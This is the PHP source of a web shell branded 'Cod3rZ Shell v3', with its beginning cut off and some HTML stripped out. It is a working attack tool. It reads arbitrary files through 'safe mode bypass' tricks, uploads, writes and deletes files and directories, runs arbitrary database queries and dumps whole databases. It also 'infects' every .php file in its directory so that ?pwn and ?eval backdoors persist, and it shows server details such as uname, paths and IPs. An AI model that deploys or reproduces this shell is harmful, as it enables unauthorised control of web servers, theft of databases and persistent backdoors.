$site - Cod3rZ

OFF"; } else { $safemode = "ON"; } $dir = @$_POST['dir']; $mkdir = @$_POST['makedir']; $mydir = @$_POST['deletedir']; $cmd = @$_GET['cmd']; $host = @$_POST['host']; $proto = @$_POST['protocol']; $delete = @$_POST['delete']; $phpeval = @$_POST['php_eval']; $db = @$_POST['db']; $query = @$_POST['query']; $user = @$_POST['user']; $pass = @$_POST['passd']; $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667"," 6668","6669","7000","8080","8018"); $quotes = get_magic_quotes_gpc(); if ($quotes == "1" or $quotes == "on") { $quot = "ON"; } else { $quot = "OFF"; } //Space $spacedir = @getcwd(); $free = @diskfreespace($spacedir); if (!$free) {$free = 0;} $all = @disk_total_space($spacedir); if (!$all) {$all = 0;} function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } $percentfree = intval(($free*100)/$all); // Safe Mode Bypass: File if(isset($_POST['redfi'])) { $test=''; $temp= tempnam($test, "cx"); $get = htmlspecialchars($_POST['filew']); if(copy("compress.zlib://".$get, $temp)){ $fopenz = fopen($temp, "r"); $freadz = fread($fopenz, filesize($temp)); fclose($fopenz); $source = htmlspecialchars($freadz); $redff = "$get
"; unlink($temp); } else { $redff = "Error"; } } // Safe Mode Bypass: Directory function dirz() { $dirz = $_POST['directory']; $files = glob("$dirz*"); foreach ($files as $filename) { echo ""; echo "$filename\n"; echo "
"; } } // PHPinfo if(isset($_POST['phpinfo'])) { die(phpinfo()); } // Make File $name = htmlspecialchars(@$_POST['names']); $src = @$_POST['source']; if(isset($name) && isset($src)) { $ctd = fopen($name,"w+"); fwrite($ctd, $src); fclose($ctd); echo ""; } // Upload File $path = @$_FILES['ffile']['tmp_name']; $name = @$_FILES['ffile']['name']; if(isset($path) && isset($name)) { if(move_uploaded_file($path, $name)) { echo ""; } else { echo ""; } } // Delete File if(isset($delete) && $delete != $path) { if(file_exists($delete)) { unlink($delete); echo ""; } } // Database if(isset($db) && isset($query) && isset($_POST['godb'])) { $mysql = mysql_connect("localhost", $user, $pass)or die(""); $db = mysql_select_db($db)or die(mysql_error()); $queryz = mysql_query($query)or die(mysql_error()); if($query) { echo ""; } else { echo ""; } } // Dump Database [pacucci.com] if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){ mysql_connect('localhost', $user, $pass); mysql_select_db($db); $tables = mysql_list_tables($db); while ($td = mysql_fetch_array($tables)) { $table = $td[0]; $r = mysql_query("SHOW CREATE TABLE `$table`"); if ($r) { $insert_sql = ""; $d = mysql_fetch_array($r); $d[1] .= ";"; $SQL[] = str_replace("\n", "", $d[1]); $table_query = mysql_query("SELECT * FROM `$table`"); $num_fields = mysql_num_fields($table_query); while ($fetch_row = mysql_fetch_array($table_query)) { $insert_sql .= "INSERT INTO $table VALUES("; for ($n=1;$n<=$num_fields;$n++) { $m = $n - 1; $insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', "; } $insert_sql = substr($insert_sql,0,-2); $insert_sql .= ");\n"; } if ($insert_sql!= "") { $SQL[] = $insert_sql; } } } $dump = "-- Database: ".$_POST['db'] ." \n"; $dump .= "-- Powered by Cod3rZ Shell v3\n"; $dump .= "-- Http://cod3rz.helloweb.eu\n"; $dumpp = $dump.implode("\r", $SQL); $name = $db."-".date("d-m-y")."_by_cod3rz_shell.sql"; Header("Content-type: application/octet-stream"); Header("Content-Disposition: attachment; filename = $name"); echo $dumpp; die(); } // Make Dir if(isset($mkdir)) { mkdir($mkdir); if($mkdir) { echo ""; } } // Delete Directory if(isset($mydir) && $mydir != "$path") { $d = dir($mydir); while($entry = $d->read()) { if ($entry !== "." && $entry !== "..") { unlink($entry); } } $d->close(); rmdir($mydir); } //Infect Files [RFI] if(isset($_POST['inf3ct'])) { foreach (glob("*.php") as $lola) { $dir = '.'; $asdi = fopen($lola, 'a+'); @fwrite($asdi, ' '); @fclose($asdi); } if($asd) { $textzz = 'Done:
?pwn=[shell]'; } else { $textzz = 'Error (Bad Perms?)'; } } //Infect Files [Eval] if(isset($_POST['evalinfect'])) { foreach (glob("*.php") as $lal) { $dir = '.'; $axd = fopen($lal, 'a+'); @fwrite($axd, ' '); @fclose($axd); } if($axd) { $textz0 = 'Done:
?eval=[eval]'; } else { $textz0 = 'Error (Bad Perms?)'; } } //File List if(!isset($dir)) { $dir = "."; } $pahtw = 0; $filew = 0; if (is_dir($dir)) { if ($open = opendir($dir)) { if(is_dir($dir)) { $typezz = "DIR"; $pahtw++; @$listf.= '['.$list.']
'.$typezz.'' . substr(sprintf('%o', fileperms($list)), -4) . ''; } while (($list = readdir($open)) == true) { if(is_dir($list)) { $typezz = "DIR"; $pahtw++; @$listf.= '['.$list.']
'.$typezz.'' . substr(sprintf('%o', fileperms($list)), -4) . ''; } else { $lolz = filesize($list) / 1024; $lolx = intval($lolz); if($lolx == 0) { $lolx = 1; } $typezz = "FILE"; $filew++; $listz = "/".$list; if(eregi($page,$listz)) { @$listf.= ''.$list.'
'.$typezz.'' . $lolx .' Kb' . substr(sprintf('%o', fileperms($list)), -4) . ''; } elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= ''.$list.'
'.$typezz.'' . $lolx .' Kb' . substr(sprintf('%o', fileperms($list)), -4) . ''; } else {@$listf.= ''.$list.'
'.$typezz.'' . $lolx .' Kb' . substr(sprintf('%o', fileperms($list)), -4) . ''; } } } closedir($open); } $fileq = $pahtw + $filew; } echo " $site - Cod3rZ ! Cod3rZ Shell !

Site: $site
Server Name: " . $_SERVER['SERVER_NAME'] . "
Software: $info
Uname -a: $uname
Path: " . $_SERVER['DOCUMENT_ROOT'] . "
Safe Mode: $safemode
Magic Quotes: $quot
Page: $page
Free Space: " . view_size($free) . " [ $percentfree% ]
Total Space: " . view_size($all) . "
Your IP: " . $_SERVER['REMOTE_ADDR'] ." - Server IP: ".$_SERVER['SERVER_ADDR']."